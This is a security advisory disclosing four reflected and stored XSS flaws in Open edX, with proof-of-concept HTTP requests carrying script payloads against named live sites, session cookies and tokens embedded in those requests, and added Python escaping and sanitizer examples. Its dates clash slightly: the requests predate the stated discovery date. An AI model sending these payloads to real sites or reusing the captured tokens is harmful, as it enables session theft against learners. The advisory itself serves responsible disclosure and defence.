ITAS SECURITY TEAM DISCOVERS MULTIPLE SECURITY VULNERABILITIES IN THE OPEN EDX ONLINE LEARNING PLATFORM

Open edX (https://github.com/edx/edx-platform) is an online learning platform developed by Harvard and MIT since 2012. It is used by many international organizations, including Microsoft, IBM, Harvard University, MIT, Stanford University and others around the world. While performing a security assessment for a customer running Open edX, ITAS SECURITY TEAM discovered several security vulnerabilities in the Open edX source code (Hawthorn.2 release, 06/29/2018). They include Stored Cross Site Scripting (Stored XSS) and Reflected Cross Site Scripting (Reflected XSS). An attacker can exploit these vulnerabilities to attack users of an Open edX system.

After ITAS Security Team reported the vulnerabilities to edX, edX verified them and confirmed a total of 4 CAT-1 security issues. ITAS Team then re-tested the reported issues a second time. To express their appreciation, edX awarded the ITAS researchers a bounty worth $600 USD.

"Thank you so much for your hard work to make edx.org more secure for its millions of learners worldwide. As a non-profit opensource company we really appreciate you taking the time to find and disclose these issues to us directly." Excerpt from the email the edX Security Team sent to the ITAS researchers.

Cross Site Scripting, also known as XSS, is item 7 in the OWASP Top 10 - 2017 (https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)). Through an XSS vulnerability an attacker injects malicious script into the application's output and from there can steal the user's session, interact with the user's browser, and build further attacks against the end user.

During our survey we found that every online learning system running the vulnerable version is at risk of attack and exploitation, for example the following sites:

  • https://courses.edx.org
  • https://openedx.microsoft.com
  • https://openedx.gse.harvard.edu
  • https://lagunita.stanford.edu
  • https://lms.mitx.mit.edu
  • https://university.redislab.com
  • https://openedx.open.ac.uk/
  • https://campus.gov.il
  • https://demo.edunext.io/

1. Application Information

Vendor : https://open.edx.org/
Download link: https://github.com/edx/edx-platform
Vulnerable version: Hawthorn.2
Fixed version: Ironwood.3
Release date: 2019-02-27

2. Vulnerability Information

a. Template – URL Cross Site Scripting

Vulnerability name: URL Cross Site Scripting
Affected URL : https://openedx-site.com/template/{PAYLOAD}
Parameter name :
Parameter Type : GET
Sample payload: <script>alert('XSS')</script>
Condition to attack:
Vulnerable file: openedx/core/djangoapps/debug/views.py
Vulnerable function: show_reference_template
Fixed link: https://github.com/edx/edx-platform/pull/19615

Proof of concept

Request

GET /template/<script>alert('XSS')</script> HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 404 Not Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:03:38 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 46
Connection: Close

Missing template <script>alert('XSS')</script>

Video (Demonstration in openedx.microsoft.com)

b. Xblock – Reflected Cross Site Scripting

Vulnerability name: Reflected Cross Site Scripting
Affected URL : https://courses.edx.org/xblock/{USAGE_ID}?view={PAYLOAD}
Parameter name : view
Parameter Type : GET
Sample payload: <script>alert('XSS')</script>
Condition to attack:
Vulnerable file: lms/djangoapps/courseware/views/views.py
Vulnerable function: render_xblock
Fixed link: https://github.com/edx/edx-platform/pull/19517

Proof of concept

Request

GET /xblock/block-v1:edX+DemoX+Demo_Course+type@vertical+block@vertical?view=<script>alert("XSS")</script> HTTP/1.1
Host: openedx.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 400 Bad Request
Cache-control: no-cache="set-cookie"
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:15:49 GMT
Server: nginx
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A9FFA4D0509C04A79307C543BC7A564BF3102652C9DDBF45788A0111B01830935A583EAE591F65FD084E6693F1009EDC31;PATH=/;MAX-AGE=120
Vary: Accept-Language, Cookie
Content-Length: 78
Connection: Close

Rendering of the xblock view '<script>alert('XSS')</script>' is not supported.

Video (Demonstration in openedx.microsoft.com)

 

c. Certificate – Reflected Cross Site Scripting

Vulnerability name: Reflected Cross-site Scripting
Affected URL : http://openedx-site.com/certificates/search/?user={PAYLOAD}
Parameter name : user
Parameter Type : GET
Sample payload: <script>alert('XSS')</script>
Condition to attack: Required staff role or higher
Vulnerable file: lms/djangoapps/certificates/views/support.py
Vulnerable function: search_certificates
Fixed link: https://github.com/edx/edx-platform/pull/19519

Proof of concept

Request

GET /certificates/search/?user=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1
Host: openedx.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: csrftoken=YexdtVBq17ovoP4JX4z0JVJprr7Jwt8m5ftnkPEztOkctN0BjVUMtWcDxcID3Fbc; experiments_is_enterprise=false; openedx-language-preference=en; edxloggedin=true; sessionid="1|ud7b2zkplcv2zzrbkkk06wtkq6ced7tp|qtpnFD16krkG|IjQ2MTA5N2NmNGEwOWFkNjNjNzJjNDg1MGQ4NDE5MTc1YTNiYTAwYTYzYmQ2NDg0NjgwYWQ3NDk4OTVhNDFmYzQi:1gYpH7:wa4qHQbmWjRbERxcmREcFCezcec"; edx-user-info="{\"username\": \"staff\"\054 \"version\": 1\054 \"enrollmentStatusHash\": \"09d498ab1dd69884525f4cdfa9cca6a6\"\054 \"header_urls\": {\"learner_profile\": \"http://192.168.1.238/u/staff\"\054 \"resume_block\": \"http://192.168.1.238/dashboard\"\054 \"logout\": \"http://192.168.1.238/logout\"\054 \"account_settings\": \"http://192.168.1.238/account/settings\"}}"
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 17 Dec 2018 09:34:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 51
Connection: close
Vary: Accept-Language, Cookie
X-Frame-Options: ALLOW
Content-Language: en
Set-Cookie: openedx-language-preference=en; expires=Mon, 31-Dec-2018 09:34:29 GMT; Max-Age=1209600; Path=/

user '<script>alert('XSS')</script>' does not exist

Video (Demonstration in openedx.local)
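The three reflected findings above (a, b and c) share one root cause: a view interpolates a request-controlled value (the template name, the view= parameter, the user= parameter) into an error message that is returned with a text/html content type, so the browser parses the reflected markup. The following Python example is added here and is not edx-platform code: the function names, the response model and the regression check are this example's own, and the two remedies it shows (HTML-escaping the value, or answering the error as text/plain) are sound general fixes, not necessarily the exact change made in the linked pull requests.

```python
"""Reflected XSS pattern behind findings (a)-(c), with hardened variants.

Added example, not edx-platform code. A minimal view is modelled as a
function returning (content_type, body): the two things that decide
whether a browser will render what was reflected.
"""
import html
from typing import Tuple

# The error messages seen in the advisory's responses, keyed by finding.
# %s marks where the request-controlled value is interpolated.
ERROR_MESSAGES = {
    "template": "Missing template %s",
    "xblock": "Rendering of the xblock view '%s' is not supported.",
    "certificate": "user '%s' does not exist",
}

# Constructed probe value, the same payload the advisory uses.
PROBE = "<script>alert('XSS')</script>"


def error_response_unsafe(kind: str, value: str) -> Tuple[str, str]:
    """Vulnerable shape: the raw request value is placed in a text/html body."""
    return "text/html; charset=utf-8", ERROR_MESSAGES[kind] % value


def error_response_escaped(kind: str, value: str) -> Tuple[str, str]:
    """Hardened: escape <, >, &, and quotes before the value enters HTML."""
    safe_value = html.escape(value, quote=True)
    return "text/html; charset=utf-8", ERROR_MESSAGES[kind] % safe_value


def error_response_plain(kind: str, value: str) -> Tuple[str, str]:
    """Alternative hardening: an error body the browser never parses as HTML."""
    return "text/plain; charset=utf-8", ERROR_MESSAGES[kind] % value


def is_reflected_unescaped(content_type: str, body: str, probe: str = PROBE) -> bool:
    """Regression check for a fixed endpoint: the probe is only dangerous when it
    comes back verbatim in a body the browser will render as HTML."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    return media_type == "text/html" and probe in body


if __name__ == "__main__":
    for kind in ERROR_MESSAGES:
        for view in (error_response_unsafe, error_response_escaped, error_response_plain):
            ctype, body = view(kind, PROBE)
            flag = is_reflected_unescaped(ctype, body)
            print(f"{kind:12s} {view.__name__:24s} reflected_unescaped={flag}")
```

The check deliberately keys on the media type as well as the body: a verbatim echo inside a text/plain or application/json response is not the same finding, and treating it as one produces false positives when re-testing the fixed endpoints.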

 

d. Wiki – Stored Cross Site Scripting

Vulnerability name: Stored Cross Site Scripting
Affected URL : https://openedx-site.com/courses/{Course_id}/course_wiki
Parameter name : content
Parameter Type : POST
Sample payload: <script>alert('XSS')</script>
Condition to attack: registered user
Vulnerable file: lms/djangoapps/course_wiki/views.py
Vulnerable function: course_wiki_redirect
Fixed link: https://github.com/edx/edx-platform/pull/20633/files

Steps to reproduce: log in as a student user and follow the steps below.
Step 1: Access the course wiki by appending course_wiki to the course URL (it does not matter whether the course has a wiki or not, e.g. https://courses.edx.org/courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki).
Step 2: Click the Edit button, put the XSS payload (<script>alert('XSS')</script>) into the wiki content, then save it.
Step 3: The payload pops up on https://courses.edx.org/wiki/{Course-id}/ (e.g. https://courses.edx.org/wiki/course-v1:Ade

Proof of concept

Request 1

GET /courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0″; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.eyJzY29wZXMiOiBbImVtYWlsIiwgInByb2ZpbGUiXSwgImFkbWluaXN0cmF0b3IiOiBmYWxzZSwgInByZWZlcnJlZF91c2VybmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAiZmlsdGVycyI6IFsidXNlcjptZSJdLCAiaWF0IjogMTU0NDM3MTYzMCwgInN1YiI6ICIxZmE2NjViMmRjNmYxZWQ3OGExNGQ0MjZmYjk0YjQ1YyIsICJmYW1pbHlfbmFtZSI6ICIiLCAiYXVkIjogInJpbm15YnllZG51YXc1cGhsaWRDb2NEdWRieWxiT2JEaWJKb2Rib3NnZXRzRWJhbGQ0IiwgImlzcyI6ICJodHRwczovL2NvdXJzZXMuZWR4Lm9yZy9vYXV0aDIiLCAiZW1haWxfdmVyaWZpZWQiOiB0cnVlLCAibmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAidmVyc2lvbiI6ICIxLjEuMCIsICJnaXZlbl9uYW1lIjogIiIsICJleHAiOiAxNTQ0Mzc1MjMwLCAiaXNfcmVzdHJpY3RlZCI6IGZhbHNlLCAiZW1haWwiOiAic3R1ZGVudGRlbW8xQG1haWxpbmF0b3IuY29tIn0; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; 
prod-edx-user-info="{\"username\": \"studentdemo1\"\054 \"version\": 1\054 \"enrollmentStatusHash\": \"02c23d94693a6636ea722152eab98136\"\054 \"header_urls\": {\"learner_profile\": \"https://courses.edx.org/u/studentdemo1\"\054 \"resume_block\": \"https://courses.edx.org/dashboard\"\054 \"logout\": \"https://courses.edx.org/logout\"\054 \"account_settings\": \"https://courses.edx.org/account/settings\"}}"
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 302 Found
Cache-control: no-cache="set-cookie"
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:03 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP="edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy"
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:03 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close

Request 2

POST /wiki/AdelaideX.Code101x.3T2015/_edit/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
Content-Type: multipart/form-data; boundary=---------------------------112257516914770264881620708143
Content-Length: 954
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0″; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.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; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”; AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255
Upgrade-Insecure-Requests: 1

-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="csrfmiddlewaretoken"

CK0hVpI1d4KR43siLr4ssdOe8sKg1y6GZWRyn9yCGb5OHWH37OgKErgfP5jsUJrL
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="title"

Programming for Data Science
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="content"

This is the wiki for **AdelaideX**'s _Programming for Data Science_.
<script>alert('XSS')</script>
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="summary"

-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="current_revision"

89992
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="save"

1
-----------------------------112257516914770264881620708143--

Response 2

HTTP/1.1 302 Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:45 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP="edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy"
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:45 GMT; Max-Age=1209600; Path=/
Set-Cookie: prod-edx-sessionid="1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|EPbOgM6D4T9p|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1dN:kxL_2U1JA0cAvinLbyXEfZppkvY"; Domain=.edx.org; expires=Sun, 06-Jan-2019 16:08:45 GMT; httponly; Max-Age=2419200; Path=/; secure
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close

Request 3

GET /wiki/AdelaideX.Code101x.3T2015/ HTTP/1.1
Host: demo.edunext.io
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
DNT: 1
Connection: close
Cookie: prod-edx-sessionid=”1|7ahalk3pygy48xh6l70e6j4ia96n4zet|IkblSszTjSXs|ImI5Y2FjMmY2YjZhOTk0NGVhZjBhMmE4NDFkMDA0ZDYwNDRiZDk5OTcyZTgzNGEzZjBiYmQ2MzIxYTg1OTRkNjAi:1gWg0X:V-pHtUuxjSFjVnSWN2DHssjuAYI”; csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; __cfduid=de755c9ba6493ba36d514c937c9f5528b1544526347; optimizelyEndUserId=oeu1544526349200r0.564235344454921; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%22de57a2d3-488b-4ada-960a-c6af0997df5b%22; experiments_is_enterprise=false; ki_t=1544526815310%3B1544526815310%3B1544526855356%3B1%3B2; edxloggedin=true; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.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; edx-jwt-cookie-signature=kHy194pQ77QiK-gwvWsvIZvBvCHfRrJedvWHyS3SvONFx-ui8sXhZ2vZ0crVVjl-LHw9No30E_GSTmSOIiZ6Szu9MJm-0eFlOVLXziztwS7XcmfF8U2yBcLck40MuqlxLAIwAxjSDSbMNCJE0oKeNzUrFqUnTJuRYcqHmXiIHiK07hTQosEFMOXThirlJqTPFndnRUC3ZLHEsR6zlIcjW94hv_8VX3Ghf-nHGAq7t-E3b8EZgMOWw52vVKoL0xDLHSMphKVceX9w2GPzKSVUop3S5WK8yPJO3F5Zsjtj8F_ll7zeY-r-FTBqBo1MuRaQAdmQhCl0NIujNTsEEa-GKg; prod-edx-language-preference=en; edx-jwt-refresh-cookie=QplV797j5qcL5sqThFjeA4o8BwHQFN; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”; prod-edx-cookie-policy-viewed=true
Upgrade-Insecure-Requests: 1

Response 3

HTTP/1.1 200 OK
Cache-control: no-cache="set-cookie"
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 11 Dec 2018 11:23:58 GMT
P3P: CP="edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy"
Server: nginx
Set-Cookie: csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; expires=Tue, 10-Dec-2019 11:23:58 GMT; Max-Age=31449600; Path=/; secure
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Tue, 25-Dec-2018 11:23:58 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A90749CECFD3E3A420861CE2F36D6BE86B832CBCF80A5BC96B29B65129A6F54A14F6993CFC88318D16B35C6A99B60FC936;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 37551
Connection: Close

……….SNIPPET……….
<div class="wiki-article">
<p>This is the wiki for <strong>AdelaideX</strong>'s <em>Programming for Data Science</em>.
<script>alert('XSS')</script></p>
</div>
……….SNIPPET……….

Video (Demonstration in demo.edunext.io)
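Finding (d) differs from the other three: the payload is stored in user-authored wiki content and served to every later reader of the article, as Response 3 shows. The following Python example is added here and is not the code of edx-platform or its wiki application; the sanitizer class, its allowlists and the sample fragment (built from the advisory's Response 3 snippet) are this example's own. It demonstrates the standard defence for content one user writes and others render: rebuilding the rendered HTML through an allowlist that drops script and style elements together with their content, strips every tag and attribute not on the list, and rejects links whose scheme is not http, https or a relative path. Markdown rendering is left out; the sanitizer runs on the HTML produced from it, before the article is stored or displayed.

```python
"""Allowlist HTML sanitizer for user-authored content (finding d).

Added example, not edx-platform or django-wiki code. The parser walks the
rendered HTML and emits a new document containing only allowlisted tags and
attributes; all text is re-escaped on the way out.
"""
import html
from html.parser import HTMLParser
from typing import List, Optional

ALLOWED_TAGS = {"p", "strong", "em", "ul", "ol", "li", "a", "code", "pre", "br"}
ALLOWED_ATTRS = {"a": {"href"}}          # no on* handlers, no style, no src
SAFE_URL_PREFIXES = ("http://", "https://", "/")   # rejects javascript: and data:
VOID_TAGS = {"br"}                        # emitted without a closing tag

# Constructed sample, modelled on the advisory's Response 3 snippet.
SAMPLE_WIKI_HTML = (
    "<p>This is the wiki for <strong>AdelaideX</strong>'s "
    "<em>Programming for Data Science</em>.\n"
    "<script>alert('XSS')</script></p>"
)


class AllowlistSanitizer(HTMLParser):
    """Rebuilds HTML keeping only allowlisted tags and attributes."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: List[str] = []
        self.open_tags: List[str] = []
        self._raw_block: Optional[str] = None  # script/style whose content is being dropped

    def handle_starttag(self, tag, attrs):
        if self._raw_block:
            return
        if tag in ("script", "style"):
            self._raw_block = tag           # drop the element and everything inside it
            return
        if tag not in ALLOWED_TAGS:
            return                          # tag dropped; its text still flows through handle_data
        kept = []
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                continue                    # unsafe scheme: keep the <a>, lose the href
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self._raw_block:
            if tag == self._raw_block:
                self._raw_block = None
            return
        if tag in self.open_tags:
            # Close everything opened after this tag too, so output stays well-formed.
            while self.open_tags:
                closed = self.open_tags.pop()
                self.out.append("</%s>" % closed)
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self._raw_block:
            self.out.append(html.escape(data, quote=False))  # text is never trusted as markup

    def finish(self) -> str:
        """Close any tags the author left open and return the sanitized HTML."""
        while self.open_tags:
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_html(fragment: str) -> str:
    """Return fragment rebuilt with only allowlisted markup."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return parser.finish()


if __name__ == "__main__":
    print(sanitize_html(SAMPLE_WIKI_HTML))
```

Because the output is rebuilt rather than filtered with a blocklist, variants such as an `<img onerror=...>` or a `javascript:` link are neutralized by the same rule that removes `<script>`: anything not explicitly permitted never reaches the stored article.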

 

Disclaimer
The author is not responsible for any misuse of the information above and accepts no liability for any damage caused by the use or misuse of these instructions. The author strictly prohibits using the security issues above to exploit and cause damage to the organizations listed above or any other organization.

Disclosure Timeline
+ 25/12/2018: vulnerabilities discovered.
+ 26/12/2018: contacted the edX Security Team and sent the vulnerability details.
+ 15/01/2019: edX Security Team confirmed the vulnerabilities.
+ 18/01/2019: edX released a new patched version.
+ 18/04/2019: public disclosure.
